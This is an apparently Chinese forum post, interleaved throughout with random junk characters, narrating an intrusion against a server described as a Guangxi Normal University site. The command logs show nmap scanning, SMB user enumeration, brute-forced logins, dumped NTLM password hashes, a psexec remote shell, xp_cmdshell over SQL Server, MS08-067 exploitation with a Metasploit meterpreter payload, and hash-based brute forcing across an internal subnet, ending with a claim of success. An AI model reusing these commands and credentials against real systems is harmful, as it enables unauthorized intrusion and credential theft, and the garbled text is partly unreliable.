广西师范网站http://202.103.242.241/
3 N8 a0 z# Z1 x, z% ~; o
( n) Z4 F: k2 R/ ?- droot@bt:~# nmap -sS -sV 202.103.242.241" j6 h. {9 n2 h) @
: m0 [6 |% o8 i9 ^Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST$ m3 W2 V+ ]) A( z# ]) G( }3 ]( |
3 A4 E" ^' _9 A: U" H: F% bNmap scan report for bogon (202.103.242.241)
" i8 A+ ~ m u' o$ h' }) Y4 p6 B% j
Host is up (0.00048s latency).
" C# G @$ ]0 P1 X5 j5 H
: k9 D$ S" ]- F1 ~- g* h sNot shown: 993 closed ports
7 h$ ?) z- V2 J" N* `% r+ a$ u( R, i# v0 }4 }8 B/ h0 G
PORT STATE SERVICE VERSION+ O! o+ W; D8 d
9 [( D9 k6 K: r; s9 E; Z: V
135/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)! y1 X/ L" p9 s% A1 L8 _4 v
2 c7 S2 ~4 r. _+ ^& T6 q139/tcp open netbios-ssn
! f* E; p* I c( B2 g/ S# U# j" M# m* C9 `, W: @ _' P/ f2 C. G7 B1 c
445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds# X8 u" j; Y: Y3 E* P/ y0 N
( F( \8 a& y o7 u- H! ?2 x8 k' s% ~
1025/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)' \9 |) B6 a# m5 m% ]1 t
% j ~0 D4 Y: ~1026/tcp open msrpc Microsoft Windows RPC; F8 v! s4 _( X5 ]' Z+ }
- d2 R l; H1 J# P# ]' Q3372/tcp open msdtc?
- j& [, l* i D& [- X7 @ J- q$ d1 E! u5 @( W- L9 {+ G
3389/tcp open ms-term-serv?
3 u) S7 [7 F4 M }" I3 A" h1 l8 \- F6 c s0 s: T
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :4 |1 M& o) l! @
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
. J# {" A# K4 N- H2 |& x
4 w7 c% f$ n% } I3 Y% QSF GetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions5 }; I& s! {9 o
/ E6 c4 }/ p2 i
SF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”)3 \8 R1 p0 B* J# V! j* t
$ `6 N x" @0 G; G' cSF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO
7 L6 N. r8 L" m& L: [: {# K% g* @9 v( V7 f2 Z! k& h h
SF:ptions,6,”hO\n\x000Z”);
- Y! y* N, }2 u' U9 j9 }2 I8 x6 A# v8 A/ r- A6 ~% q3 a
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
0 n3 N, H+ o. }5 V) t5 E
: @' J1 q( Y9 K2 W2 JService Info: OS: Windows( n5 C( w& F5 j2 v, t; i
4 u9 L1 M7 o( h* s" R' Q4 Q
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
1 g1 c8 [$ y/ m" C( p! Z# B
0 c N9 h! Q4 P+ r9 a' sNmap done: 1 IP address (1 host up) scanned in 79.12 seconds
- r% A t2 ^0 z$ R8 r9 b% A) s+ q+ a0 B' B3 J
root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb //列出扫描脚本
Y9 L7 J. {0 x# t: Z) j; O" u4 q& o/ D1 u5 G2 P- d
-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse
8 B9 w% y, q$ ?* M. ~8 A6 \% C; C& L, y: D
-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
) l+ p% p8 I g$ @5 F W- r* |; e- B O
-rw-r–r– 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse
0 ~7 ?% T/ A& W& c" x. f
# W4 N2 q" c, i-rw-r–r– 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse
8 L- @. E# j. c- ?0 R% s
1 s8 q# q$ I" f2 q7 v. |) l4 K-rw-r–r– 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse
+ c8 [0 o8 |# r: p& J0 U* \0 s5 ^4 i7 [, c+ V K
-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse1 S" _6 e6 M T9 a: a+ `+ e0 s; }( t
* T2 @- h7 m$ w/ n5 t: D-rw-r–r– 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse8 U) c) i8 \3 r9 Y" u5 {
. M$ \ G$ _9 t( r: Y3 \! J w-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
% f* P# {8 F) I. S( u9 W6 g# [9 J* s' h! x$ a
-rw-r–r– 1 root root 1658 2011-07-09 07:36 smb-flood.nse4 [" F7 P$ z1 [/ U+ I, T+ y
9 C# |/ N+ N0 \-rw-r–r– 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse( L+ z [, p) o$ q8 S2 F: h
7 o/ O8 L1 E& w$ V+ r
-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
* S, u2 m ?# z0 B8 Y9 G. E- \3 I" }
-rw-r–r– 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse( V8 m. g, Y7 b. M
% o# |2 P: { U+ [/ k. q* W- l
-rw-r–r– 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse
2 f) D: Q4 V$ Y2 n8 t) Y0 Q- E
" n# P+ g9 } M5 P$ `0 [( l-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse' \4 }7 _. U- t: M6 l; m
4 X N' k# ]0 B, X7 L-rw-r–r– 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse5 u9 X) m# \9 D
* D" G" @) r3 Q2 r# w
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241
0 \" m8 K- ], j
o2 a O% }) F( w//此乃使用脚本扫描远程机器所存在的账户名
7 T3 s& |0 j: v; q3 E5 ^( t1 L3 U" q
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
1 ^3 c! n) h) Z+ r
! Z( B; ?5 A" s' t9 ~4 B/ {) x4 U" G2 ZNmap scan report for bogon (202.103.242.241)
. s& B3 m0 A: h5 c8 f" o6 p7 ]% G4 z6 i8 z+ t
Host is up (0.00038s latency).
" B% E, S3 p, c0 z& E1 N0 L, c
' ]; Z* F- J4 \0 h& C; ~, ENot shown: 993 closed ports# i: h* @; F2 t8 V5 s* ?
2 U* F# _7 R4 ?, w A' f4 x1 CPORT STATE SERVICE
8 V1 {% K) C4 P; s. n
+ N: u1 \ C0 k135/tcp open msrpc& T. Q) A7 \1 Q
* i) g; ]/ Z4 g: x* ?2 h8 i5 P/ ?139/tcp open netbios-ssn" t. E8 X8 |$ i( \
- }3 _. m- f5 S% f& U( e. M445/tcp open microsoft-ds5 q. T V) T% I4 G U; q* h4 j
: C/ r! M" e4 V5 w
1025/tcp open NFS-or-IIS+ M' d' `& c9 }% u
! E* Q p& V% S3 y' R" n+ y. v
1026/tcp open LSA-or-nterm4 A% T: g& v* f0 y
0 `$ {( f5 W7 M& y7 }. Q4 ^3372/tcp open msdtc5 O- h% I) |0 S8 q, C$ X
" H3 `% N: G! i2 F' N/ o* z1 o3389/tcp open ms-term-serv5 T y3 B- {7 T7 c/ ?) n
. | j1 T1 s9 }& r% vMAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems); |; G+ `. L. x$ H+ S
3 G, _ Q7 X' f0 L
Host script results:' {; ]/ B/ b1 W7 S
7 h" K; v: {8 C6 z4 h6 X6 K% \0 g
| smb-enum-users:% u! C. p+ a' l0 ?: S& n3 g
( L2 c$ K: H. ^% x
|_ Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果8 R1 {$ s; ~$ l/ B% {
4 @' C3 v- G( d6 s/ MNmap done: 1 IP address (1 host up) scanned in 1.09 seconds8 i) A. w- c. `4 z$ k; @( m. u+ h
: V+ x( ~: p: ]% vroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241
8 d) c3 h+ d+ z, @# j. S5 ^& t- L0 r8 U% s1 D, k
//查看共享) d" _2 N3 @- x- ?' R. d0 V
& j5 m6 o0 A" V' t DStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST# r( }) J9 R5 b. M8 d! H. `
7 i1 _- l8 a+ z/ e b/ E$ n. _/ u
Nmap scan report for bogon (202.103.242.241)( G4 a# G+ r `0 d% X( d1 G
! o2 s& x. p) l# u* _9 U9 qHost is up (0.00035s latency). ~+ Y9 P9 W! h! A( Z& |; {. s
1 o1 p* Z0 e3 k4 z/ P, W: f" \9 N9 ?; ^Not shown: 993 closed ports( j9 M. z1 I3 i. B" g3 Q5 F
2 `' I8 f' X/ o. ]$ ^1 m. O$ ]PORT STATE SERVICE: n4 T" A+ W1 m+ o
4 j5 p# g8 [" F0 `' }: s1 j135/tcp open msrpc
! V, g1 T4 h# M. r
: ]4 G# v$ b6 D8 @3 ^139/tcp open netbios-ssn$ L" g7 L) i# q
7 o. I5 j6 O Y# Q, l, [445/tcp open microsoft-ds9 u4 ]; {6 b% ?$ j+ z( K
: w$ T: W3 Y" ^+ e
1025/tcp open NFS-or-IIS/ h7 K3 z9 R7 I+ E% P2 [7 U
+ }4 ^% B4 C" N* _3 N5 o- t0 P1026/tcp open LSA-or-nterm- L9 b8 S- F7 `( r. H
4 s( u# A4 h: |5 _9 h# w
3372/tcp open msdtc
) Q/ O* \. Q6 \# }7 S$ t% l
8 I ]1 w0 Q# y7 e- j3389/tcp open ms-term-serv
0 x$ N1 K9 ~1 g7 r0 j- m: {. @7 \
9 U$ h9 W6 c9 `1 r/ a1 [! i, ]2 n" fMAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)3 h& U# M8 e, @/ s
4 k1 Z/ G z" k& g4 xHost script results:) Z) r2 M5 [5 P
9 R2 E6 j$ C9 ^( \: m| smb-enum-shares:! q [5 v3 E) t. E. A
9 d" z& g8 h. J# A0 M| ADMIN$
: G6 V# L# K7 Z: v- T
# q0 _3 l$ ]5 _3 Q5 A( p0 n3 u" J| Anonymous access: <none>
% e5 Q- y$ p9 U" ~% o) [* u/ f& G6 u# w0 T- a6 b8 K
| C$1 r, Y5 n0 a( ~$ Y5 M( \
% G; H' _: H% v- u5 e5 R
| Anonymous access: <none>* Y% e7 q3 v- K& Z1 O' w
/ x3 X$ m0 E0 P' b/ n$ K| IPC$
; p# Y, A5 e. I, _/ O/ }6 p o% u
|_ Anonymous access: READ, R4 |& ]+ R' c
5 d/ C2 o$ m3 _) |2 p `7 a( yNmap done: 1 IP address (1 host up) scanned in 1.05 seconds. o: @: | E1 W1 [7 U7 |
1 Z) C3 x, H4 J9 Croot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241 0 s: j- K5 l7 O: g
+ b8 z) v/ e9 O& `% F% w* b1 |2 s8 ^
//获取用户密码& i, j8 x7 z' I
4 ]/ E: e5 ]- c# _5 X. P
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
2 E/ c) Q! F4 |5 g+ J1 x S/ v; s- G2 E# h! c- Y( `5 P
Nmap scan report for bogon (202.103.242.2418)
& V+ T$ b9 I5 n. ~, j! U
( L% y0 u/ \# h' iHost is up (0.00041s latency).
* D C5 ^4 P; `) |( C0 K7 D
7 Q4 ?( _1 n7 l: A& a8 v- W$ q8 YNot shown: 993 closed ports
( ~9 q/ C, K" t+ n3 _4 F4 o1 ^3 K( { W7 a4 |- U5 l) |
PORT STATE SERVICE/ n) }2 F s! e5 d. M9 o+ I
- t- P+ S8 J5 p- i135/tcp open msrpc9 o3 o1 b5 T& s+ H8 x5 D
7 h1 Z/ j7 ]0 R# q/ z8 [8 `
139/tcp open netbios-ssn7 f' u- d$ k& V, y& L ?
2 j: z' H" V2 o6 i3 Z! x
445/tcp open microsoft-ds
& U4 C4 Q" h `0 ~9 x& r# V# o6 D A+ T0 i
1025/tcp open NFS-or-IIS
- G9 [4 }. v% c; s w
6 Z6 {4 M) |4 C7 P1026/tcp open LSA-or-nterm' r. s" M/ p+ ], K6 W% p3 _) h
: h, L; ]7 l9 J, L0 N4 r
3372/tcp open msdtc* v: s0 \, m* T w4 ~
6 ~0 y* k7 e- X3 o# w! a
3389/tcp open ms-term-serv" l6 r7 _, \3 `% G# O# I
& V. B) @1 {9 D. X, i* j9 I0 [' G, p
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
* |$ |$ ~, ^. ~2 j i- G4 x3 A/ K6 j, e9 f- W
Host script results:
% G6 g2 Z1 h7 k4 b; q8 x
- |( s# s% b# z0 ~9 _9 t, I| smb-brute:
7 V# }% B7 O, l/ x/ ]* m/ { T" h( a+ h, U
administrator:<blank> => Login was successful
, {6 r* u4 O) T" f8 w' V k* Y8 D- ~" @8 S# P9 r) o5 j. R
|_ test:123456 => Login was successful
! W9 o& O! H5 H, J. H/ s. k# r3 E9 v
Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds* U, T" y; _. }) H: |
# g' K) v2 W8 ^7 r) A+ B5 Z3 v5 {
root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash% Z* s; Q# U! `' W6 k
* P& ~3 S4 W3 h8 S4 q; Iroot@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
. D+ k% I# R& n
' j ^ O0 n% z- V, X7 ^root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
0 W+ {0 i' v) j- j% Y: H. Y& i) d4 r0 N
root@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139
# h% ?) M/ d+ G( R: ?6 p
* o5 q% C, S2 p( }1 R1 oStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST( p9 }2 `( H9 m& P; d
2 ^* T7 w/ C) f! q4 yNmap scan report for bogon (202.103.242.241)
) c7 d+ [2 T8 H6 X; v9 x: e" V% z
Host is up (0.0012s latency).3 w% m1 w5 o3 _/ G- B! B% v6 Z
( [9 ^6 l( o: P4 ?/ O- e
PORT STATE SERVICE
7 r$ N& D6 D! W. H. B _; B! e0 h7 k
135/tcp open msrpc: Z- m5 d7 a( X, N( _
9 d0 b) v! {- s' N
139/tcp open netbios-ssn; |" B8 |+ O( k: M+ R/ i. t* J
! H: S2 Z8 z+ B4 ?; ?445/tcp open microsoft-ds3 g: t k; s: @! u/ q6 b6 E% s
$ i8 `, i' d( s. L: i
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)0 y* \1 V. t! p0 S" N' ~1 W
; {. y) E* F% WHost script results:. I0 U$ d) F+ [
( f/ A4 [1 o5 L, I| smb-pwdump:6 Q3 s* K2 e' h% F3 W3 [: y7 Y
% J; L! O* {+ H7 i; Y9 C" u9 t
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
k" o0 w$ c5 Q' N* r2 P9 _/ G* i; [# _% `- \ p& x5 W/ H
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
: h. y" o2 S: e s6 f% T7 K0 U5 `
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
3 ^9 Q+ ~) h ^" ^. m1 w+ U; a" r% `" X4 S
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2
( {1 E3 z, r! r/ i. J" k7 c
+ s) E2 d' J& Y+ \) a lNmap done: 1 IP address (1 host up) scanned in 1.85 seconds% ~' Y! P6 @+ V: R
. j7 r+ \" L6 ]/ s9 G
C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test //获取一个cmdshell
}4 g. C6 ?5 W, [3 i7 p0 b
) p! A& }* Z( ~. h. {0 {8 ` _-p 123456 -e cmd.exe
7 `! Q! w* h- M* {9 [* A+ Y6 i) |" m% j" p( ~+ l( Y7 m1 D
PsExec v1.55 – Execute processes remotely
0 @' t! |5 L" t7 H" r1 O) [0 a9 a. i- U. g
Copyright (C) 2001-2004 Mark Russinovich% K* g& k/ Z: d, ~% j
. f, @7 G+ k6 O
Sysinternals – www.sysinternals.com
' L( Y1 `7 D9 \2 T' E( x k' s: P- `+ z7 Y( U; D; o
Microsoft Windows 2000 [Version 5.00.2195]) q0 l8 ~6 _. K
5 \0 ^' D7 ^7 T(C) 版权所有 1985-2000 Microsoft Corp.
' h4 m+ d5 y! x( G) \- K$ Q/ C* i
& Y+ T1 ?1 J$ M8 d. m! ?8 JC:\WINNT\system32>ipconfig8 K3 ]8 z" Z4 n, I
3 z3 ^% [ ?$ | [9 _Windows 2000 IP Configuration
2 a( o3 h& W; z2 }' y) J( |. U! e" X4 r, ^2 J7 [$ [! l
Ethernet adapter 本地连接:
4 K5 ^* c0 \( D8 b8 {5 a9 F! n& v, @; E
Connection-specific DNS Suffix . :3 g7 o/ _" o. I( w" m
/ u. h9 ^6 x1 r# p g; FIP Address. . . . . . . . . . . . : 202.103.242.241
* M7 |! S3 ?& ?# W0 J/ B* @% m/ ]8 }, Z; e' y# d8 J V) k5 s
Subnet Mask . . . . . . . . . . . : 255.255.255.04 J* P# m3 _/ j# s. b# i8 w* p: o
. }$ a$ r5 [" t' j8 DDefault Gateway . . . . . . . . . : 202.103.1.1/ _6 J& N# z, _2 r. `, Q7 \
3 v( ]: l4 _' s+ K3 K
C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “ //远程登录sa执行命令
4 o4 M: G1 X) B+ K8 S: @
+ `7 `- l, P( {2 Y! X% p1 Croot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241 //检测目标机器漏洞
# L, P) u4 i# W6 ^3 B6 V" W
6 F9 _7 n; D3 O# F) z" PStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST. ^8 I( T' _5 P3 P4 n" N& o
0 k; S2 [. u) m2 SNmap scan report for bogon (202.103.242.241)* _# l- d# W, i# d1 ?
- t* F4 b) `8 o: ~Host is up (0.00046s latency).
6 v5 D. h+ D/ o$ o5 ` K
' Y0 V/ `) u4 s/ F4 |# ?Not shown: 993 closed ports
. s: _1 v* q k4 q3 Y9 o1 F+ I# o+ Y' j7 d6 N) z/ W
PORT STATE SERVICE
! I0 `7 S4 K' B; }2 l3 r7 ?2 c2 U6 _5 I6 k
135/tcp open msrpc# H d: d' [' ]3 U( f
+ ~4 L# }* W+ P6 w) Z! u
139/tcp open netbios-ssn
0 u2 p6 Q5 a5 Y/ @# d4 B- U- x7 Z t
445/tcp open microsoft-ds
3 I0 a8 E3 L" ^1 c k& e% s/ G
! Q6 N7 ~' X- }- w1025/tcp open NFS-or-IIS& B. l {0 z% m+ I7 Z+ z; e
4 M0 G2 s6 h( L
1026/tcp open LSA-or-nterm
2 D# j$ Z4 J7 x* E
K% C6 I3 d1 l; p3372/tcp open msdtc+ \0 Q; l) Y) h5 p4 \
- ~/ ^/ T, N2 u `3389/tcp open ms-term-serv. F- v# t, }) m. H2 _
' w% m! x8 a- I9 ^9 _MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
5 |8 I, ?) c8 x/ k# W3 j+ b- C; ~; j2 @* K7 N* @" m
Host script results:
7 X) @8 Y! Z+ l. ~
8 _* L) e4 k$ ~! X. s0 Q' l| smb-check-vulns:
0 K/ F$ E) i, u0 B- M) v5 B& J* m2 U
8 v- R! x. ^$ p' q1 s4 Y* p5 F9 C|_ MS08-067: VULNERABLE
V# u+ E- a9 z8 K5 c P$ R
# t/ \* q4 O3 m) N3 ?3 F* z$ @, S# ]Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds4 M V# j) w p% q
# @ @% c6 Y- n, w9 a- B- E' C
root@bt:~# msfconsole //在msf上利用ms08-067漏洞对目标机器进行溢出8 u0 K1 X; {9 j& A8 w9 _/ H1 X
; U7 y: v; g' K/ A: k5 c8 ^msf > search ms087 T8 O, g- b2 [) F6 U
* I O! Z T% i% S; wmsf > use exploit/windows/smb/ms08_067_netapi) b% c8 e* o9 y( z9 c! Q
/ d1 [9 ]4 Z( G0 ?. d: q
msf exploit(ms08_067_netapi) > show options
( b+ x/ L1 D( t0 V( B) D i; @
8 ]5 J: d& \, E: d9 Y; ~2 e2 Tmsf exploit(ms08_067_netapi) > set RHOST 202.103.242.241/ ^, G t, I1 Y: K
/ l& I% r }& V/ l( m" ~
msf exploit(ms08_067_netapi) > show payloads
N# q2 h5 J! D
+ V8 g# B9 N0 v* z" Lmsf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp% s- f7 H7 L( J0 E/ m$ j+ ~
0 j+ S: G: H: k' V3 a9 ?msf exploit(ms08_067_netapi) > exploit2 \; ?4 a2 o @/ N4 C
3 F$ b2 R% e1 ?meterpreter >
8 v9 p. \" I. F% \7 ~& t, m$ a8 i" U* A+ r
Background session 2? [y/N] (ctrl+z)/ Q+ u4 j7 ?9 O+ f( L
: @ H/ r6 A$ ^7 J Emsf exploit(ms08_067_netapi) > sessions -l
# b3 U& i+ ~) m. l6 h* F& T+ d/ @
: I& o! P2 {4 D& ^8 [' O Uroot@bt:/usr/local/share/nmap/scripts# vim usernames.txt* y7 `$ N% ^" A. M
* B c( |1 `, h% E
test
' H5 ^5 w' l, E# X# M+ }. ?: v: T1 \; @( q& n. ~# z
administrator8 ?( Y$ W- S S$ \8 V6 M* [9 I
) X4 Y6 f5 h& V% w7 i3 Kroot@bt:/usr/local/share/nmap/scripts# vim password.txt
9 ~; c3 G7 ~" t6 w
' d. e. i F& C3 H" W4 o44EFCE164AB921CAAAD3B435B51404EE3 l0 j& o3 e0 P7 J& N2 R: B
6 Y5 m2 N% n$ ^5 H$ _5 \
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254 2 {5 \& g: |- ?+ L0 V% C
! Z9 c8 K+ d- U" m //利用用户名跟获取的hash尝试对整段内网进行登录
4 o, l6 d0 k6 c5 C$ d: k) ?
+ d0 g" I) A! z5 w7 zNmap scan report for 192.168.1.105
7 O6 W. R) u' a" `& u; B G- R1 r" H7 x4 o; R1 d
Host is up (0.00088s latency).7 H: s4 r3 B+ M6 U
+ T, b3 G0 \0 K& B6 m7 W9 \/ s1 b3 JNot shown: 993 closed ports
( C2 i" x- ^0 a/ U( x: ^0 G0 d& u3 F8 _
PORT STATE SERVICE- f* K r5 i. w7 {
% S$ s- ?% J' u2 y; Q135/tcp open msrpc5 v5 Q1 ]& |8 @( P' P: b5 Y
5 {6 J* c! m% ^6 a+ Q9 f+ J139/tcp open netbios-ssn
1 D: e; }8 T6 w5 _9 m
' `3 X8 N3 c# x5 i8 z445/tcp open microsoft-ds8 L5 k! i, _- A# f. }4 ~1 `
4 }6 T7 Q3 F% h3 s* g/ M' l1025/tcp open NFS-or-IIS
3 J3 m8 I$ t) B& V' y7 o) R4 d' {% C* c
1026/tcp open LSA-or-nterm; `) j5 G) W$ B
5 t5 k4 t; t6 R4 E# L9 @
3372/tcp open msdtc
: O2 w9 I& o8 g" l0 k7 ?5 c+ f/ y, Q; X
3389/tcp open ms-term-serv3 A Q6 t5 `2 [+ d2 b8 k4 K
) ^ ?' r7 g' ?' h$ t& iMAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)- `* M5 C* r6 n9 a
* V @: r4 W0 C6 B
Host script results:9 J5 v( v5 k7 h( z) C
# c7 l P7 @* o9 A
| smb-brute:
5 t. x* q+ X) K$ v+ Q
6 S+ o9 k/ G Q' T% _- H+ e2 g; M7 y|_ administrator:<blank> => Login was successful. c. Z# U) s- O, D- h
/ _9 k H2 q/ ^" a+ z: Q3 P+ k
攻击成功,一个简单的msf+nmap攻击~~·
' N" D' _/ k- h$ u+ }' w
. r' c' X# }& |* x |